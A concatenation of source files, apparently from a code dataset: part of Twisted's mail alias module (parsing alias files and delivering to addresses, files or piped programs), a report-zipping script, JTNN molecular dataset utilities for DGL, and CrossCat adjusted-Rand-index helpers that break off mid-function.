aliasN Aliases beginning with a C{|} will be treated as programs, will be run, and the message will be written to their stdin. Aliases beginning with a C{:} will be treated as a file containing additional aliases for the username. Aliases beginning with a C{/} will be treated as the full pathname to a file to which the message will be appended. Aliases without a host part will be assumed to be addresses on localhost. If a username is specified multiple times, the aliases for each are joined together as if they had all been on one line. Lines beginning with a space or a tab are continuations of the previous line. Lines beginning with a C{#} are comments. @type domains: L{dict} mapping L{bytes} to L{IDomain} provider @param domains: A mapping of domain name to domain object. @type filename: L{bytes} or L{NoneType <types.NoneType>} @param filename: The full or relative path to a file from which to load aliases. If omitted, the C{fp} parameter must be specified. @type fp: file-like object or L{NoneType <types.NoneType>} @param fp: The file from which to load aliases. If specified, the C{filename} parameter is ignored. @rtype: L{dict} mapping L{bytes} to L{AliasGroup} @return: A mapping from username to group of aliases. """ result = {} if fp is None: fp = file(filename) else: filename = getattr(fp, 'name', '<unknown>') i = 0 prev = '' for line in fp: i += 1 line = line.rstrip() if line.lstrip().startswith('#'): continue elif line.startswith(' ') or line.startswith('\t'): prev = prev + line else: if prev: handle(result, prev, filename, i) prev = line if prev: handle(result, prev, filename, i) for (u, a) in result.items(): addr = smtp.Address(u) result[u] = AliasGroup(a, domains, u) return result class IAlias(Interface): """ An interface for aliases. """ def createMessageReceiver(): """ Create a message receiver. @rtype: L{IMessage <smtp.IMessage>} provider @return: A message receiver. """ class AliasBase: """ The default base class for aliases. @ivar domains: See L{__init__}. @type original: L{Address} @ivar original: The original address being aliased. """ def __init__(self, domains, original): """ @type domains: L{dict} mapping L{bytes} to L{IDomain} provider @param domains: A mapping of domain name to domain object. @type original: L{bytes} @param original: The original address being aliased. """ self.domains = domains self.original = smtp.Address(original) def domain(self): """ Return the domain associated with original address. @rtype: L{IDomain} provider @return: The domain for the original address. """ return self.domains[self.original.domain] def resolve(self, aliasmap, memo=None): """ Map this alias to its ultimate destination. @type aliasmap: L{dict} mapping L{bytes} to L{AliasBase} @param aliasmap: A mapping of username to alias or group of aliases. @type memo: L{NoneType <types.NoneType>} or L{dict} of L{AliasBase} @param memo: A record of the aliases already considered in the resolution process. If provided, C{memo} is modified to include this alias. @rtype: L{IMessage <smtp.IMessage>} or L{NoneType <types.NoneType>} @return: A message receiver for the ultimate destination or None for an invalid destination. """ if memo is None: memo = {} if str(self) in memo: return None memo[str(self)] = None return self.createMessageReceiver() class AddressAlias(AliasBase): """ An alias which translates one email address into another. @type alias : L{Address} @ivar alias: The destination address. """ implements(IAlias) def __init__(self, alias, *args): """ @type alias: L{Address}, L{User}, L{bytes} or object which can be converted into L{bytes} @param alias: The destination address. @type args: 2-L{tuple} of (0) L{dict} mapping L{bytes} to L{IDomain} provider, (1) L{bytes} @param args: Arguments for L{AliasBase.__init__}. """ AliasBase.__init__(self, *args) self.alias = smtp.Address(alias) def __str__(self): """ Build a string representation of this L{AddressAlias} instance. @rtype: L{bytes} @return: A string containing the destination address. """ return '<Address %s>' % (self.alias,) def createMessageReceiver(self): """ Create a message receiver which delivers a message to the destination address. @rtype: L{IMessage <smtp.IMessage>} provider @return: A message receiver. """ return self.domain().exists(str(self.alias)) def resolve(self, aliasmap, memo=None): """ Map this alias to its ultimate destination. @type aliasmap: L{dict} mapping L{bytes} to L{AliasBase} @param aliasmap: A mapping of username to alias or group of aliases. @type memo: L{NoneType <types.NoneType>} or L{dict} of L{AliasBase} @param memo: A record of the aliases already considered in the resolution process. If provided, C{memo} is modified to include this alias. @rtype: L{IMessage <smtp.IMessage>} or L{NoneType <types.NoneType>} @return: A message receiver for the ultimate destination or None for an invalid destination. """ if memo is None: memo = {} if str(self) in memo: return None memo[str(self)] = None try: return self.domain().exists(smtp.User(self.alias, None, None, None), memo)() except smtp.SMTPBadRcpt: pass if self.alias.local in aliasmap: return aliasmap[self.alias.local].resolve(aliasmap, memo) return None class FileWrapper: """ A message receiver which delivers a message to a file. @type fp: file-like object @ivar fp: A file used for temporary storage of the message. @type finalname: L{bytes} @ivar finalname: The name of the file in which the message should be stored. """ implements(smtp.IMessage) def __init__(self, filename): """ @type filename: L{bytes} @param filename: The name of the file in which the message should be stored. """ self.fp = tempfile.TemporaryFile() self.finalname = filename def lineReceived(self, line): """ Write a received line to the temporary file. @type line: L{bytes} @param line: A received line of the message. """ self.fp.write(line + '\n') def eomReceived(self): """ Handle end of message by writing the message to the file. @rtype: L{Deferred <defer.Deferred>} which successfully results in L{bytes} @return: A deferred which succeeds with the name of the file to which the message has been stored or fails if the message cannot be saved to the file. """ self.fp.seek(0, 0) try: f = file(self.finalname, 'a') except: return defer.fail(failure.Failure()) f.write(self.fp.read()) self.fp.close() f.close() return defer.succeed(self.finalname) def connectionLost(self): """ Close the temporary file when the connection is lost. """ self.fp.close() self.fp = None def __str__(self): """ Build a string representation of this L{FileWrapper} instance. @rtype: L{bytes} @return: A string containing the file name of the message. """ return '<FileWrapper %s>' % (self.finalname,) class FileAlias(AliasBase): """ An alias which translates an address to a file. @ivar filename: See L{__init__}. """ implements(IAlias) def __init__(self, filename, *args): """ @type filename: L{bytes} @param filename: The name of the file in which to store the message. @type args: 2-L{tuple} of (0) L{dict} mapping L{bytes} to L{IDomain} provider, (1) L{bytes} @param args: Arguments for L{AliasBase.__init__}. """ AliasBase.__init__(self, *args) self.filename = filename def __str__(self): """ Build a string representation of this L{FileAlias} instance. @rtype: L{bytes} @return: A string containing the name of the file. """ return '<File %s>' % (self.filename,) def createMessageReceiver(self): """ Create a message receiver which delivers a message to the file. @rtype: L{FileWrapper} @return: A message receiver which writes a message to the file. """ return FileWrapper(self.filename) class ProcessAliasTimeout(Exception): """ An error indicating that a timeout occurred while waiting for a process to complete. """ class MessageWrapper: """ A message receiver which delivers a message to a child process. @type completionTimeout: L{int} or L{float} @ivar completionTimeout: The number of seconds to wait for the child process to exit before reporting the delivery as a failure. @type _timeoutCallID: L{NoneType <types.NoneType>} or L{IDelayedCall <twisted.internet.interfaces.IDelayedCall>} provider @ivar _timeoutCallID: The call used to time out delivery, started when the connection to the child process is closed. @type done: L{bool} @ivar done: A flag indicating whether the child process has exited (C{True}) or not (C{False}). @type reactor: L{IReactorTime <twisted.internet.interfaces.IReactorTime>} provider @ivar reactor: A reactor which will be used to schedule timeouts. @ivar protocol: See L{__init__}. @type processName: L{bytes} or L{NoneType <types.NoneType>} @ivar processName: The process name. @type completion: L{Deferred <defer.Deferred>} @ivar completion: The deferred which will be triggered by the protocol when the child process exits. """ implements(smtp.IMessage) done = False completionTimeout = 60 _timeoutCallID = None reactor = reactor def __init__(self, protocol, process=None, reactor=None): """ @type protocol: L{ProcessAliasProtocol} @param protocol: The protocol associated with the child process. @type process: L{bytes} or L{NoneType <types.NoneType>} @param process: The process name. @type reactor: L{NoneType <types.NoneType>} or L{IReactorTime <twisted.internet.interfaces.IReactorTime>} provider @param reactor: A reactor which will be used to schedule timeouts. """ self.processName = process self.protocol = protocol self.completion = defer.Deferred() self.protocol.onEnd = self.completion self.completion.addBoth(self._processEnded) if reactor is not None: self.reactor = reactor def _processEnded(self, result): """ Record process termination and cancel the timeout call if it is active. @type result: L{Failure <failure.Failure>} @param result: The reason the child process terminated. @rtype: L{NoneType <types.NoneType>} or L{Failure <failure.Failure>} @return: None, if the process end is expected, or the reason the child process terminated, if the process end is unexpected. """ self.done = True if self._timeoutCallID is not None: # eomReceived was called, we're actually waiting for the process to # exit. self._timeoutCallID.cancel() self._timeoutCallID = None else: # eomReceived was not called, this is unexpected, propagate the # error. return result def lineReceived(self, line): """ Write a received line to the child process. @type line: L{bytes} @param line: A received line of the message. """ if self.done: return self.protocol.transport.write(line + '\n') def eomReceived(self): """ Disconnect from the child process and set up a timeout to wait for it to exit. @rtype: L{Deferred <defer.Deferred>} @return: A deferred which will be called back when the child process exits. """ if not self.done: self.protocol.transport.loseConnection() self._timeoutCallID = self.reactor.callLater( self.completionTimeout, self._completionCancel) return self.completion def _completionCancel(self): """ Handle the expiration of the timeout for the child process to exit by terminating the child process forcefully and issuing a failure to the L{completion} deferred. """ self._timeoutCallID = None self.protocol.transport.signalProcess('KILL') exc = ProcessAliasTimeout( "No answer after %s seconds" % (self.completionTimeout,)) self.protocol.onEnd = None self.completion.errback(failure.Failure(exc)) def connectionLost(self): """ Ignore notification of lost connection. """ def __str__(self): """ Build a string representation of this L{MessageWrapper} instance. @rtype: L{bytes} @return: A string containing the name of the process. """ return '<ProcessWrapper %s>' % (self.processName,) class ProcessAliasProtocol(protocol.ProcessProtocol): """ A process protocol which errbacks a deferred when the associated process ends. @type onEnd: L{NoneType <types.NoneType>} or L{Deferred <defer.Deferred>} @ivar onEnd: If set, a deferred on which to errback when the process ends. """ onEnd = None def processEnded(self, reason): """ Call an errback. @type reason: L{Failure <failure.Failure>} @param reason: The reason the child process terminated. """ if self.onEnd is not None: self.onEnd.errback(reason) class ProcessAlias(AliasBase): """ An alias which is handled by the execution of a program. @type path: L{list} of L{bytes} @ivar path: The arguments to pass to the process. The first string is the executable's name. @type program: L{bytes} @ivar program: The path of the program to be executed. @type reactor: L{IReactorTime <twisted.internet.interfaces.IReactorTime>} and L{IReactorProcess <twisted.internet.interfaces.IReactorProcess>} provider @ivar reactor: A reactor which will be used to create and timeout the child process. """ implements(IAlias) reactor = reactor def __init__(self, path, *args): """ @type path: L{bytes} @param path: The command to invoke the program consisting of the path to the executable followed by any arguments. @type args: 2-L{tuple} of (0) L{dict} mapping L{bytes} to L{IDomain} provider, (1) L{bytes} @param args: Arguments for L{AliasBase.__init__}. """ AliasBase.__init__(self, *args) self.path = path.split() self.program = self.path[0] def __str__(self): """ Build a string representation of this L{ProcessAlias} instance. @rtype: L{bytes} @return: A string containing the command used to invoke the process. """ return '<Process %s>' % (self.path,) def spawnProcess(self, proto, program, path): """ Spawn a process. This wraps the L{spawnProcess <twisted.internet.interfaces.IReactorProcess.spawnProcess>} method on L{reactor} so that it can be customized for test purposes. @type proto: L{IProcessProtocol <twisted.internet.interfaces.IProcessProtocol>} provider @param proto: An object which will be notified of all events related to the created process. @type program: L{bytes} @param program: The full path name of the file to execute. @type path: L{list} of L{bytes} @param path: The arguments to pass to the process. The first string should be the executable's name. @rtype: L{IProcessTransport <twisted.internet.interfaces.IProcessTransport>} provider @return: A process transport. """ return self.reactor.spawnProcess(proto, program, path) def createMessageReceiver(self): """ Launch a process and create a message receiver to pass a message to the process. @rtype: L{MessageWrapper} @return: A message receiver which delivers a message to the process. """ p = ProcessAliasProtocol() m = MessageWrapper(p, self.program, self.reactor) fd = self.spawnProcess(p, self.program, self.path) return m class MultiWrapper: """ A message receiver which delivers a single message to multiple other message receivers. @ivar objs: See L{__init__}. """ implements(smtp.IMessage) def __init__(self, objs): """ @type objs: L{list} of L{IMessage <smtp.IMessage>} provider @param objs: Message receivers to which the incoming message should be directed. """ self.objs = objs def lineReceived(self, line): """ Pass a received line to the message receivers. @type line: L{bytes} @param line: A line of the message. """ for o in self.objs: o.lineReceived(line) def eomReceived(self): """ Pass the end of message along to the message receivers. @rtype: L{DeferredList <defer.DeferredList>} whose successful results are L{bytes} or L{NoneType <types.NoneType>} @return: A deferred list which triggers when all of the message receivers have finished handling their end of message. """ return defer.DeferredList([ o.eomReceived() for o in self.objs ]) def connectionLost(self): """ Inform the message receivers that the connection has been lost. """ for o in self.objs: o.connectionLost() def __str__(self): """ Build a string representation of this L{MultiWrapper} instance. @rtype: L{bytes} @return: A string containing a list of the message receivers. """ return '<GroupWrapper %r>' % (map(str, self.objs),) class AliasGroup(AliasBase): """ An alias which points to multiple destination aliases. @type processAliasFactory: no-argument callable which returns L{ProcessAlias} @ivar processAliasFactory: A factory for process aliases. @type aliases: L{list} of L{AliasBase} which implements L{IAlias} @ivar aliases: The destination aliases. """ implements(IAlias) processAliasFactory = ProcessAlias def __init__(self, items, *args): """ Create a group of aliases. Parse a list of alias strings and, for each, create an appropriate alias object. @type items: L{list} of L{bytes} @param items: Aliases. @type args: n-L{tuple} of (0) L{dict} mapping L{bytes} to L{IDomain} provider, (1) L{bytes} @param args: Arguments for L{AliasBase.__init__}. """ AliasBase.__init__(self, *args) self.aliases = [] while items: addr = items.pop().strip() if addr.startswith(':'): try: f = file(addr[1:]) except: log.err("Invalid filename in alias file %r" % (addr[1:],)) else: addr = ' '.join([l.strip() for l in f]) items.extend(addr.split(',')) elif addr.startswith('|'): self.aliases.append(self.processAliasFactory(addr[1:], *args)) elif addr.startswith('/'): if os.path.isdir(addr): log.err("Directory delivery not supported") else: self.aliases.append(FileAlias(addr, *args)) else: self.aliases.append(AddressAlias(addr, *args)) def __len__(self): """ Return the number of aliases in the group. @rtype: L{int} @return: The number of aliases in the group. """ return len(self.aliases) def __str__(self): """ Build a string representation of this L{AliasGroup} instance. @rtype: L{bytes} @return: A string containing the aliases in the group. """ return '<AliasGroup [%s]>' % (', '.join(map(str, self.aliases))) def createMessageReceiver(self): """ Create a message receiver for each alias and return a message receiver which will pass on a message to each of those. @rtype: L{MultiWrapper} @return: A message receiver which passes a message on to message receivers for each alias in the group. """ return MultiWrapper([a.createMessageReceiver() for a in self.aliases]) def resolve(self, aliasmap, memo=None): """ Map each of the aliases in the group to its ultimate destination. @type aliasmap: L{dict} mapping L{bytes} to L{AliasBase} @param aliasmap: A mapping of username to alias or group of aliases. @type memo: L{NoneType <types.NoneType>} or L{dict} of L{AliasBase} @param memo: A record of the aliases already considered in the resolution process. If provided, C{memo} is modified to include this alias. @rtype: L{MultiWrapper} @return: A message receiver which passes the message on to message receivers for the ultimate destination of each alias in the group. """ if memo is None: memo = {} r = [] for a in self.aliases: r.append(a.resolve(aliasmap, memo)) return MultiWrapper(filter(None, r))
31.04908
89
0.592334
ec3661ddc38fe4da04624cb4b8f004fc142a080f
1,350
py
Python
zipper.py
mayankcodeops/museum_api
d93f94e7938e13e5a01f95cb930a87692e6bd166
[ "MIT" ]
null
null
null
zipper.py
mayankcodeops/museum_api
d93f94e7938e13e5a01f95cb930a87692e6bd166
[ "MIT" ]
1
2021-12-07T09:47:31.000Z
2021-12-07T09:47:31.000Z
zipper.py
mayankcodeops/museum_api
d93f94e7938e13e5a01f95cb930a87692e6bd166
[ "MIT" ]
null
null
null
import logging import zipfile import os from config import config CONFIG_NAME = os.environ.get('CONFIG_NAME', 'default') logging.basicConfig(filename='app.log', filemode='w', format='%(asctime)s : %(levelname)s : %(message)s', level=logging.DEBUG) def zip_reports(compressed_file, *args): """ Creates a compressed zip of all the reports in the desired directory :compressed_file: name of the zip file to be created. :args: takes in the files that are needed to be compressed to a zip file """ try: with zipfile.ZipFile(compressed_file, 'w') as zipped_report: for file in args: file_path = os.path.join(config[CONFIG_NAME].REPORT_DIR, file) if os.path.isfile(file_path): zipped_report.write(file_path, compress_type=zipfile.ZIP_DEFLATED) else: logging.error(f"No file with filename: {file} exists in the {config[CONFIG_NAME].REPORT_DIR}. " f"Proceeding with other file compression") except OSError as error: logging.exception(f"OSError while writing reports import a zip: {error.args[-1]}") if __name__ == '__main__': zip_reports('reports.zip', 'museum.csv', 'museum.html', 'museum.pdf', 'museum.xml')
38.571429
115
0.624444
53449c2f118c7bdd197f5c421c9a494a06a7fff1
8,993
py
Python
examples/generative_models/jtnn/jtnn/datautils.py
seqRep/dgl-lifesci
c4bd45be6dbb59dc270957ed90bb19d9ed6dc157
[ "Apache-2.0" ]
1
2020-06-22T19:19:24.000Z
2020-06-22T19:19:24.000Z
examples/generative_models/jtnn/jtnn/datautils.py
seqRep/dgl-lifesci
c4bd45be6dbb59dc270957ed90bb19d9ed6dc157
[ "Apache-2.0" ]
null
null
null
examples/generative_models/jtnn/jtnn/datautils.py
seqRep/dgl-lifesci
c4bd45be6dbb59dc270957ed90bb19d9ed6dc157
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # SPDX-License-Identifier: Apache-2.0 import dgl import os import torch from dgl.data.utils import download, extract_archive, get_download_dir from torch.utils.data import Dataset from .mol_tree import Vocab, DGLMolTree from .chemutils import mol2dgl_dec, mol2dgl_enc ELEM_LIST = ['C', 'N', 'O', 'S', 'F', 'Si', 'P', 'Cl', 'Br', 'Mg', 'Na', 'Ca', 'Fe', 'Al', 'I', 'B', 'K', 'Se', 'Zn', 'H', 'Cu', 'Mn', 'unknown'] ATOM_FDIM_DEC = len(ELEM_LIST) + 6 + 5 + 1 BOND_FDIM_DEC = 5 MAX_NB = 10 PAPER = os.getenv('PAPER', False) _url = 'https://s3-ap-southeast-1.amazonaws.com/dgl-data-cn/dataset/jtnn.zip' def _unpack_field(examples, field): return [e[field] for e in examples] def _set_node_id(mol_tree, vocab): wid = [] for i, node in enumerate(mol_tree.nodes_dict): mol_tree.nodes_dict[node]['idx'] = i wid.append(vocab.get_index(mol_tree.nodes_dict[node]['smiles'])) return wid class JTNNDataset(Dataset): def __init__(self, data, vocab, training=True): self.dir = get_download_dir() self.zip_file_path='{}/jtnn.zip'.format(self.dir) download(_url, path=self.zip_file_path) extract_archive(self.zip_file_path, '{}/jtnn'.format(self.dir)) print('Loading data...') if data in ['train', 'test']: data_file = '{}/jtnn/{}.txt'.format(self.dir, data) else: data_file = data with open(data_file) as f: self.data = [line.strip("\r\n ").split()[0] for line in f] self.vocab_file = '{}/jtnn/{}.txt'.format(self.dir, vocab) print('Loading finished.') print('\tNum samples:', len(self.data)) print('\tVocab file:', self.vocab_file) self.training = training self.vocab = Vocab([x.strip("\r\n ") for x in open(self.vocab_file)]) def __len__(self): return len(self.data) def __getitem__(self, idx): smiles = self.data[idx] mol_tree = DGLMolTree(smiles) mol_tree.recover() mol_tree.assemble() wid = _set_node_id(mol_tree, self.vocab) # prebuild the molecule graph mol_graph, atom_x_enc, bond_x_enc = mol2dgl_enc(mol_tree.smiles) result = { 'mol_tree': mol_tree, 'mol_graph': mol_graph, 'atom_x_enc': atom_x_enc, 'bond_x_enc': bond_x_enc, 'wid': wid, } if not self.training: return result # prebuild the candidate graph list cands = [] for node_id, node in mol_tree.nodes_dict.items(): # fill in ground truth if node['label'] not in node['cands']: node['cands'].append(node['label']) node['cand_mols'].append(node['label_mol']) if node['is_leaf'] or len(node['cands']) == 1: continue cands.extend([(cand, mol_tree, node_id) for cand in node['cand_mols']]) if len(cands) > 0: cand_graphs, atom_x_dec, bond_x_dec, tree_mess_src_e, \ tree_mess_tgt_e, tree_mess_tgt_n = mol2dgl_dec(cands) else: cand_graphs = [] atom_x_dec = torch.zeros(0, ATOM_FDIM_DEC) bond_x_dec = torch.zeros(0, BOND_FDIM_DEC) tree_mess_src_e = torch.zeros(0, 2).long() tree_mess_tgt_e = torch.zeros(0, 2).long() tree_mess_tgt_n = torch.zeros(0).long() # prebuild the stereoisomers cands = mol_tree.stereo_cands if len(cands) > 1: if mol_tree.smiles3D not in cands: cands.append(mol_tree.smiles3D) stereo_graphs = [mol2dgl_enc(c) for c in cands] stereo_cand_graphs, stereo_atom_x_enc, stereo_bond_x_enc = \ zip(*stereo_graphs) stereo_atom_x_enc = torch.cat(stereo_atom_x_enc) stereo_bond_x_enc = torch.cat(stereo_bond_x_enc) stereo_cand_label = [(cands.index(mol_tree.smiles3D), len(cands))] else: stereo_cand_graphs = [] stereo_atom_x_enc = torch.zeros(0, atom_x_enc.shape[1]) stereo_bond_x_enc = torch.zeros(0, bond_x_enc.shape[1]) stereo_cand_label = [] result.update({ 'cand_graphs': cand_graphs, 'atom_x_dec': atom_x_dec, 'bond_x_dec': bond_x_dec, 'tree_mess_src_e': tree_mess_src_e, 'tree_mess_tgt_e': tree_mess_tgt_e, 'tree_mess_tgt_n': tree_mess_tgt_n, 'stereo_cand_graphs': stereo_cand_graphs, 'stereo_atom_x_enc': stereo_atom_x_enc, 'stereo_bond_x_enc': stereo_bond_x_enc, 'stereo_cand_label': stereo_cand_label, }) return result class JTNNCollator(object): def __init__(self, vocab, training): self.vocab = vocab self.training = training @staticmethod def _batch_and_set(graphs, atom_x, bond_x, flatten): if flatten: graphs = [g for f in graphs for g in f] graph_batch = dgl.batch(graphs) graph_batch.ndata['x'] = atom_x graph_batch.edata.update({ 'x': bond_x, 'src_x': atom_x.new(bond_x.shape[0], atom_x.shape[1]).zero_(), }) return graph_batch def __call__(self, examples): # get list of trees mol_trees = _unpack_field(examples, 'mol_tree') wid = _unpack_field(examples, 'wid') for _wid, mol_tree in zip(wid, mol_trees): mol_tree.ndata['wid'] = torch.LongTensor(_wid) # TODO: either support pickling or get around ctypes pointers using scipy # batch molecule graphs mol_graphs = _unpack_field(examples, 'mol_graph') atom_x = torch.cat(_unpack_field(examples, 'atom_x_enc')) bond_x = torch.cat(_unpack_field(examples, 'bond_x_enc')) mol_graph_batch = self._batch_and_set(mol_graphs, atom_x, bond_x, False) result = { 'mol_trees': mol_trees, 'mol_graph_batch': mol_graph_batch, } if not self.training: return result # batch candidate graphs cand_graphs = _unpack_field(examples, 'cand_graphs') cand_batch_idx = [] atom_x = torch.cat(_unpack_field(examples, 'atom_x_dec')) bond_x = torch.cat(_unpack_field(examples, 'bond_x_dec')) tree_mess_src_e = _unpack_field(examples, 'tree_mess_src_e') tree_mess_tgt_e = _unpack_field(examples, 'tree_mess_tgt_e') tree_mess_tgt_n = _unpack_field(examples, 'tree_mess_tgt_n') n_graph_nodes = 0 n_tree_nodes = 0 for i in range(len(cand_graphs)): tree_mess_tgt_e[i] += n_graph_nodes tree_mess_src_e[i] += n_tree_nodes tree_mess_tgt_n[i] += n_graph_nodes n_graph_nodes += sum(g.number_of_nodes() for g in cand_graphs[i]) n_tree_nodes += mol_trees[i].number_of_nodes() cand_batch_idx.extend([i] * len(cand_graphs[i])) tree_mess_tgt_e = torch.cat(tree_mess_tgt_e) tree_mess_src_e = torch.cat(tree_mess_src_e) tree_mess_tgt_n = torch.cat(tree_mess_tgt_n) cand_graph_batch = self._batch_and_set(cand_graphs, atom_x, bond_x, True) # batch stereoisomers stereo_cand_graphs = _unpack_field(examples, 'stereo_cand_graphs') atom_x = torch.cat(_unpack_field(examples, 'stereo_atom_x_enc')) bond_x = torch.cat(_unpack_field(examples, 'stereo_bond_x_enc')) stereo_cand_batch_idx = [] for i in range(len(stereo_cand_graphs)): stereo_cand_batch_idx.extend([i] * len(stereo_cand_graphs[i])) if len(stereo_cand_batch_idx) > 0: stereo_cand_labels = [ (label, length) for ex in _unpack_field(examples, 'stereo_cand_label') for label, length in ex ] stereo_cand_labels, stereo_cand_lengths = zip(*stereo_cand_labels) stereo_cand_graph_batch = self._batch_and_set( stereo_cand_graphs, atom_x, bond_x, True) else: stereo_cand_labels = [] stereo_cand_lengths = [] stereo_cand_graph_batch = None stereo_cand_batch_idx = [] result.update({ 'cand_graph_batch': cand_graph_batch, 'cand_batch_idx': cand_batch_idx, 'tree_mess_tgt_e': tree_mess_tgt_e, 'tree_mess_src_e': tree_mess_src_e, 'tree_mess_tgt_n': tree_mess_tgt_n, 'stereo_cand_graph_batch': stereo_cand_graph_batch, 'stereo_cand_batch_idx': stereo_cand_batch_idx, 'stereo_cand_labels': stereo_cand_labels, 'stereo_cand_lengths': stereo_cand_lengths, }) return result
37.785714
81
0.603136
e0a5b48147e5339d4b061e16b74df66abe2ffbc1
8,727
py
Python
src/utils/convergence_test_utils.py
vishalbelsare/crosscat
1f2ac5a43a50ebd7aaa89f0c5ac3815a170848c5
[ "Apache-2.0" ]
207
2015-09-23T08:35:22.000Z
2021-11-24T23:05:55.000Z
src/utils/convergence_test_utils.py
vishalbelsare/crosscat
1f2ac5a43a50ebd7aaa89f0c5ac3815a170848c5
[ "Apache-2.0" ]
52
2015-09-18T21:19:54.000Z
2018-12-15T21:17:32.000Z
src/utils/convergence_test_utils.py
vishalbelsare/crosscat
1f2ac5a43a50ebd7aaa89f0c5ac3815a170848c5
[ "Apache-2.0" ]
33
2015-10-30T22:50:30.000Z
2020-07-01T00:29:55.000Z
# # Copyright (c) 2010-2016, MIT Probabilistic Computing Project # # Lead Developers: Dan Lovell and Jay Baxter # Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka # Research Leads: Vikash Mansinghka, Patrick Shafto # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import numpy # import crosscat.cython_code.State as State import crosscat.utils.general_utils as gu import crosscat.utils.sample_utils as su def calc_ari(group_idx_list_1, group_idx_list_2): from collections import defaultdict def make_set_dict(list): set_dict = defaultdict(set) add_element = lambda idx_group: set_dict[idx_group[1]].add(idx_group[0]) map(add_element, enumerate(list)) return set_dict def check_short_circuit(set_dict_1, list_1, set_dict_2, list_2): both_all_apart = len(set_dict_1) == len(list_1) and \ len(set_dict_2) == len(list_2) both_all_together = len(set_dict_1) == 1 and len(set_dict_2) == 1 return both_all_apart or both_all_together def gen_contingency_data(set_dict_1, set_dict_2): ##https://en.wikipedia.org/wiki/Rand_index#The_contingency_table array_dim = (len(set_dict_1), len(set_dict_2)) Ns = numpy.ndarray(array_dim) for idx_1, value1 in enumerate(set_dict_1.values()): for idx_2, value2 in enumerate(set_dict_2.values()): Ns[idx_1, idx_2] = len(value1.intersection(value2)) As = Ns.sum(axis=1) Bs = Ns.sum(axis=0) return Ns, As, Bs def choose_2_sum(x): return sum(x * (x - 1) / 2.0) group_idx_dict_1 = make_set_dict(group_idx_list_1) group_idx_dict_2 = make_set_dict(group_idx_list_2) if check_short_circuit(group_idx_dict_1, group_idx_list_1, group_idx_dict_2, group_idx_list_2): return 1.0 Ns, As, Bs = gen_contingency_data(group_idx_dict_1, group_idx_dict_2) n_choose_2 = choose_2_sum(numpy.array([len(group_idx_list_1)])) cross_sums = choose_2_sum(Ns[Ns>1]) a_sums = choose_2_sum(As) b_sums = choose_2_sum(Bs) numerator = n_choose_2 * cross_sums - a_sums * b_sums denominator = .5 * n_choose_2 * (a_sums + b_sums) - a_sums * b_sums return numerator / denominator def determine_synthetic_column_ground_truth_assignments(num_cols, num_views): num_cols_per_view = num_cols / num_views view_assignments = [] for view_idx in range(num_views): view_assignments.extend([view_idx] * num_cols_per_view) return view_assignments def truth_from_permute_indices(data_inverse_permutation_indices, num_rows,num_cols,num_views, num_clusters): # We assume num_rows is divisible by num_clusters and num_cols is divisible by num_views num_cols_per_view = num_cols/num_views view_assignments = [] for viewindx in range(num_views): view_assignments = view_assignments + [viewindx]*num_cols_per_view num_rows_per_cluster = num_rows/num_clusters reference_list = [] for clusterindx in range(num_clusters): reference_list = reference_list + [clusterindx]*num_rows_per_cluster X_D_truth = [] for viewindx in range(num_views): X_D_truth.append([a for (b,a) in sorted(zip(data_inverse_permutation_indices[viewindx], reference_list))]) return view_assignments, X_D_truth def ARI_CrossCat(Xc, Xrv, XRc, XRrv): ''' Adjusted Rand Index (ARI) calculation for a CrossCat clustered table To calculate ARI based on the CrossCat partition, each cell in the table is considered as an instance to be assigned to a cluster. A cluster is defined by both the view index AND the category index. In other words, if, and only if, two cells, regardless of which columns and rows they belong to, are lumped into the same view and category, the two cells are considered to be in the same cluster. For a table of size Nrow x Ncol Xc: (1 x Ncol) array of view assignment for each column. Note: It is assumed that the view indices are consecutive integers starting from 0. Hence, the number of views is equal to highest view index plus 1. Xrv: (Nrow x Nview) array where each row is the assignmennt of categories for the corresponding row in the data table. The i-th element in a row corresponds to the category assignment of the i-th view of that row. XRc and XRrv have the same format as Xr and Xrv respectively. The ARI index is calculated from the comparison of the table clustering define by (XRc, XRrv) and (Xc, Xrv). ''' Xrv = Xrv.T XRrv = XRrv.T # Find the highest category index of all views max_cat_index = numpy.max(Xrv) # re-assign category indices so that they have different values in # different views Xrv = Xrv + numpy.arange(0,Xrv.shape[1])*(max_cat_index+1) # similarly for the reference partition max_cat_index = numpy.max(XRrv) XRrv = XRrv + numpy.arange(0,XRrv.shape[1])*(max_cat_index+1) # Table clustering assignment for the first partition CellClusterAssgn = numpy.zeros((Xrv.shape[0], Xc.size)) for icol in range(Xc.size): CellClusterAssgn[:,icol]=Xrv[:,Xc[icol]] # Flatten the table to a 1-D array compatible with the ARI function CellClusterAssgn = CellClusterAssgn.reshape(CellClusterAssgn.size) # Table clustering assignment for the second partition RefCellClusterAssgn = numpy.zeros((Xrv.shape[0], Xc.size)) for icol in range(Xc.size): RefCellClusterAssgn[:,icol]=XRrv[:,XRc[icol]] # Flatten the table RefCellClusterAssgn = RefCellClusterAssgn.reshape(RefCellClusterAssgn.size) # Compare the two partitions using ARI ARI = calc_ari(RefCellClusterAssgn, CellClusterAssgn) ARI_viewonly = calc_ari(Xc, XRc) return ARI, ARI_viewonly def get_column_ARI(X_L, view_assignment_truth): view_assignments = X_L['column_partition']['assignments'] ARI = calc_ari(view_assignments, view_assignment_truth) return ARI def get_column_ARIs(X_L_list, view_assignment_truth): get_column_ARI_helper = lambda X_L: \ get_column_ARI(X_L, view_assignment_truth) ARIs = map(get_column_ARI_helper, X_L_list) return ARIs def multi_chain_ARI(X_L_list, X_D_List, view_assignment_truth, X_D_truth, return_list=False): num_chains = len(X_L_list) ari_table = numpy.zeros(num_chains) ari_views = numpy.zeros(num_chains) for chainindx in range(num_chains): view_assignments = X_L_list[chainindx]['column_partition']['assignments'] curr_ari_table, curr_ari_views = ARI_CrossCat(numpy.asarray(view_assignments), numpy.asarray(X_D_List[chainindx]), numpy.asarray(view_assignment_truth), numpy.asarray(X_D_truth)) ari_table[chainindx] = curr_ari_table ari_views[chainindx] = curr_ari_views ari_table_mean = numpy.mean(ari_table) ari_views_mean = numpy.mean(ari_views) if return_list: return 